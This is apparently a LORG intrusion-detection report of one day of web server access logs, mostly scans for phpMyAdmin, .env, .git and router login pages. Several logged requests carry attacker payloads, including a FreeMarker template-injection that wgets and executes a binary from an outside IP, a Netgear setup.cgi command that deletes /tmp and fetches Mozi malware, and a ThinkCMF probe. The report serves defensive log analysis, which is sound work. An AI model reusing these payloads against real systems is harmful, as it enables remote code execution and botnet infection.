LORG Detection Results [lorg]

Summary: 2 incidents discovered from one client

192.168.21.127 | 2 incidents | impact ∑: 22

attacks only

Description: A human attacker and targeted scan yesterday. A total of 2 incidents where discovered by phpids detection modules.

Impact	Tags	Remote-City	Remote-Host	Remote-Logname	Remote-User	Date	Request	Final-Status	Bytes-Sent	Referer	User-Agent
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 06:30:32 +0200	POST /boaform/admin/formLogin HTTP/1.1	404	456	http://91.223.222.117:80/admin/login.asp	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 07:07:24 +0200	GET / HTTP/1.1	200	5091	-	(.*?)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 07:53:36 +0200	GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0	404	461	-	-
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 07:59:50 +0200	GET /2021_11_24_vipex_access.log.1.html HTTP/1.1	200	244	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 08:44:49 +0200	GET /2022_01_12_report_access.log.1.html HTTP/1.1	200	244	-	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 08:56:09 +0200	POST /boaform/admin/formLogin HTTP/1.1	404	456	http://91.223.222.117:80/admin/login.asp	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 09:17:16 +0200	GET / HTTP/1.1	200	5091	-	Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 09:29:49 +0200	GET /robots.txt HTTP/1.1	404	462	-	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 09:31:58 +0200	HEAD / HTTP/1.1	200	146	-	Go-http-client/1.1
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 09:32:04 +0200	GET / HTTP/1.1	200	5099	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 09:32:04 +0200	GET /icons/blank.gif HTTP/1.1	200	395	http://webproxy1.opennet.hu/	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 09:41:02 +0200	GET /favicon.ico HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 10:14:49 +0200	GET /2019_11_28_vipex_access.log.1.html HTTP/1.1	200	88169	-	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 10:18:21 +0200	GET / HTTP/1.1	200	95670	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 10:18:21 +0200	GET / HTTP/1.1	200	95670	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 10:18:21 +0200	GET / HTTP/1.1	200	95670	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 10:18:21 +0200	GET / HTTP/1.1	200	95670	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 10:18:21 +0200	GET / HTTP/1.1	200	95670	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 10:18:29 +0200	GET / HTTP/1.1	200	95670	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 10:23:04 +0200	GET / HTTP/1.1	200	95670	-	Java/1.8.0_342
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 11:15:49 +0200	GET / HTTP/1.1	200	5090	https://hk.search.yahoo.com/search?p=todayad.live	Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)
10	xss csrf dt id lfi	-	192.168.21.127	-	-	Thu, 18 Aug 2022 11:34:22 +0200	GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cd /tmp; wget http://107.189.8.21/pedalcheta/cutie.x86_64; curl -O http://107.189.8.21/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 VMware")} HTTP/1.1	404	456	-	Anan mal 123
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 11:44:49 +0200	GET /2020_08_26_vipex_access.log.1.html HTTP/1.1	200	58747	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 11:58:42 +0200	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm -rf /tmp/*;wget http://192.168.1.1:8088/Mozi.m -O /tmp/netgear;sh netgear&curpath=/&currentsetting.htm=1 HTTP/1.0	404	461	-	-
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 12:29:15 +0200	GET /owa/auth/x.js HTTP/1.1	404	456	-	Mozilla/5.0 zgrab/0.x
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 12:34:41 +0200	GET / HTTP/1.1	200	95670	-	-
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 12:38:45 +0200	GET /js../.git/config HTTP/1.1	404	456	-	Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 12:40:17 +0200	GET / HTTP/1.1	200	95670	-	-
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 12:52:04 +0200	GET /phpmyadmin/ HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 13:00:17 +0200	GET / HTTP/1.1	200	95670	-	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 13:21:02 +0200	GET /system_api.php HTTP/1.1	404	209	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 13:21:03 +0200	GET /streaming/clients_live.php HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 13:21:05 +0200	GET /stream/live.php HTTP/1.1	404	456	-	Roku/DVP-9.10 (289.10E04111A)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 13:21:06 +0200	GET / HTTP/1.1	200	5091	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:54 +0200	GET /sql/myadmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:54 +0200	GET /phpmyadmin2015/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:54 +0200	GET /administrator/db/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:55 +0200	GET /db/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:55 +0200	GET /phpmyadmin2018/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:55 +0200	GET /phpMyAdmin-5.2.0/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:56 +0200	GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:56 +0200	GET /sql/sql/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:57 +0200	GET /mysql/pMA/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:57 +0200	GET /phpmyadmin2019/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:57 +0200	GET /sql/websql/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:58 +0200	GET /db/webadmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:58 +0200	GET /phpmyadmin2021/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:58 +0200	GET /db/websql/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:59 +0200	GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:07:59 +0200	GET /db/dbadmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:00 +0200	GET /phpmyadmin_/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:00 +0200	GET /administrator/PMA/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:01 +0200	GET /sql/phpmanager/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:01 +0200	GET /mysql/db/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:02 +0200	GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:02 +0200	GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:02 +0200	GET /sql/webadmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:03 +0200	GET /MyAdmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:03 +0200	GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:03 +0200	GET /database/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:04 +0200	GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:04 +0200	GET /sql/sqlweb/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:05 +0200	GET /sql/sql-admin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:05 +0200	GET /phpmyadmin2011/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:05 +0200	GET /admin/pma/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:06 +0200	GET /administrator/pma/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:06 +0200	GET /mysql/web/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:06 +0200	GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:07 +0200	GET /admin/db/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:07 +0200	GET /phpmyadmin2016/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:07 +0200	GET /mysql/dbadmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:08 +0200	GET /phpMyAdmin2/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:08 +0200	GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:09 +0200	GET /sqlmanager/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:09 +0200	GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:09 +0200	GET /db/phpmyadmin5/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:10 +0200	GET /mysqlmanager/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:10 +0200	GET /PMA/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:10 +0200	GET /dbadmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:11 +0200	GET /phpMyAdmin_/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:11 +0200	GET /myadmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:11 +0200	GET /phpMyAdmin1/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:12 +0200	GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:12 +0200	GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:12 +0200	GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:13 +0200	GET /2phpmyadmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:13 +0200	GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:14 +0200	GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:14 +0200	GET /mysqladmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:14 +0200	GET /phpmyadmin5/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:15 +0200	GET /admin/sysadmin/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:15 +0200	GET /phpmyadmin2020/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:15 +0200	GET /phpmyadmin2013/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:08:16 +0200	GET /phpmyadmin2/index.php?lang=en HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 14:38:58 +0200	GET /solr/admin/info/system?wt=json HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 15:29:14 +0200	GET / HTTP/1.1	200	95670	-	-
12	xss csrf id rfe lfi	-	192.168.21.127	-	-	Thu, 18 Aug 2022 15:30:30 +0200	GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1	200	5091	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 16:13:32 +0200	POST /GponForm/diag_Form?images/ HTTP/1.1	404	451	-	Hello, World
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 16:18:33 +0200	GET / HTTP/1.1	200	5091	-	Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 16:40:38 +0200	GET /.env HTTP/1.1	404	456	-	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 17:04:48 +0200	GET /.env HTTP/1.1	404	456	-	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 17:04:51 +0200	POST / HTTP/1.1	404	456	-	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 17:04:56 +0200	GET /.env HTTP/1.1	404	456	-	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 17:05:01 +0200	POST / HTTP/1.1	404	456	-	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 17:05:09 +0200	GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1	404	456	-	python-requests/2.26.0
